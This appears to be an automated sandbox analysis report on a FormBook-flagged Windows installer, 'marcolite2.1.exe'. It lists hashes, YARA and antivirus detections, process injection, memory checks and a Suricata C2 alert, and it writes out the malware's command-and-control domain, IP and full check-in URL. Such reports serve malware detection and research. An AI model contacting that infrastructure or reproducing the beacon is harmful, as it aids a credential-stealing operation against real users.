Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 11, 2023, 7:49 a.m.	Oct. 11, 2023, 8 a.m.

Size	358.9KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`71ea87bcc822a68c4ef492ecbdba37f6`
SHA256	`197619791b979892a3f7a7cabb4314b10b360c67442a2b4f101cef42f6b0f412`
CRC32	`4ADA4C58`
ssdeep	`6144:aXFKo57XMMNuGNHK9y/oglt04BkxN/ciCPBxOThL+SuV3rhH/gaQ:aX/rNuGkMb042xN/CDr9rR/HQ`
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature NSIS_Installer - Null Soft Installer IsPE32 - (no description)

marcolite2.1.exe "C:\Users\test22\AppData\Local\Temp\marcolite2.1.exe"
2564
- psvta.exe "C:\Users\test22\AppData\Local\Temp\psvta.exe"
  2664
  - psvta.exe "C:\Users\test22\AppData\Local\Temp\psvta.exe"
    2708

Name	Response	Post-Analysis Lookup
www.ascend-help.tech
www.adam-automatik.com
www.cysh100th.com	CNAME cysh100th.com A 66.235.200.146	66.235.200.146
www.ep0i.com

IP Address	Status	Action
164.124.101.2	Active	Moloch
66.235.200.146	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49166 -> 66.235.200.146:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 11, 2023, 7:49 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.ndata

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://www.cysh100th.com/t6tg/?RVE=C4RGcRJ+oFeN6Dw5JyxSSWJXrhqNO9HSkiwUjsu5KAkN06m/6Uw6tkK+9OBn6uuuNd9cxUAj&oX=Txo8ntIpM8sp

Performs some HTTP requests (1 event)

request

GET http://www.cysh100th.com/t6tg/?RVE=C4RGcRJ+oFeN6Dw5JyxSSWJXrhqNO9HSkiwUjsu5KAkN06m/6Uw6tkK+9OBn6uuuNd9cxUAj&oX=Txo8ntIpM8sp

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 11, 2023, 7:49 a.m.	process_identifier: 2564 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 7:49 a.m.	process_identifier: 2664 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00490000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 7:49 a.m.	process_identifier: 2664 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a0000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 11, 2023, 7:49 a.m.	process_identifier: 2708 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00860000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\psvta.exe

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0000d000', u'virtual_address': u'0x0003a000', u'entropy': 6.9086671767484225, u'name': u'.rsrc', u'virtual_size': u'0x0000cf48'}

entropy

6.90866717675

description

A section with a high entropy has been found

entropy

0.619047619048

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 11, 2023, 7:49 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2664 called NtSetContextThread to modify thread in remote process 2708
NtSetContextThread Oct. 11, 2023, 7:49 a.m.	registers.eip: 1995571652 registers.esp: 1638384 registers.edi: 0 registers.eax: 4321408 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000104 process_identifier: 2708	1	0	0

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Strab.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.NSISX.Spy.Gen.24
FireEye	Generic.mg.71ea87bcc822a68c
Skyhigh	BehavesLike.Win32.Generic.fc
ALYac	Trojan.NSISX.Spy.Gen.24
Cylance	unsafe
VIPRE	Trojan.NSISX.Spy.Gen.24
CrowdStrike	win/malicious_confidence_90% (W)
K7GW	Trojan ( 0052eef11 )
K7AntiVirus	Trojan ( 0052eef11 )
Arcabit	Trojan.NSISX.Spy.Gen.24
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	UDS:Trojan.Win32.Strab.gen
BitDefender	Trojan.NSISX.Spy.Gen.24
Avast	Win32:TrojanX-gen [Trj]
Trapmine	suspicious.low.ml.score
Emsisoft	Trojan.NSISX.Spy.Gen.24 (B)
Kingsoft	malware.kb.a.862
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	HEUR:Trojan.Win32.Strab.gen
GData	Trojan.NSISX.Spy.Gen.24
Google	Detected
McAfee	Artemis!71EA87BCC822
MAX	malware (ai score=80)
VBA32	BScope.Trojan.Injector
Malwarebytes	Generic.Malware/Suspicious
Rising	Trojan.Generic@AI.97 (RDML:QxMB1xosFsu/sKAb5sxN+w)
Ikarus	Trojan.NSIS.Agent
BitDefenderTheta	Gen:NN.ZexaF.36738.kmW@aC7l28i
AVG	Win32:TrojanX-gen [Trj]
DeepInstinct	MALICIOUS

marcolite2.1.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All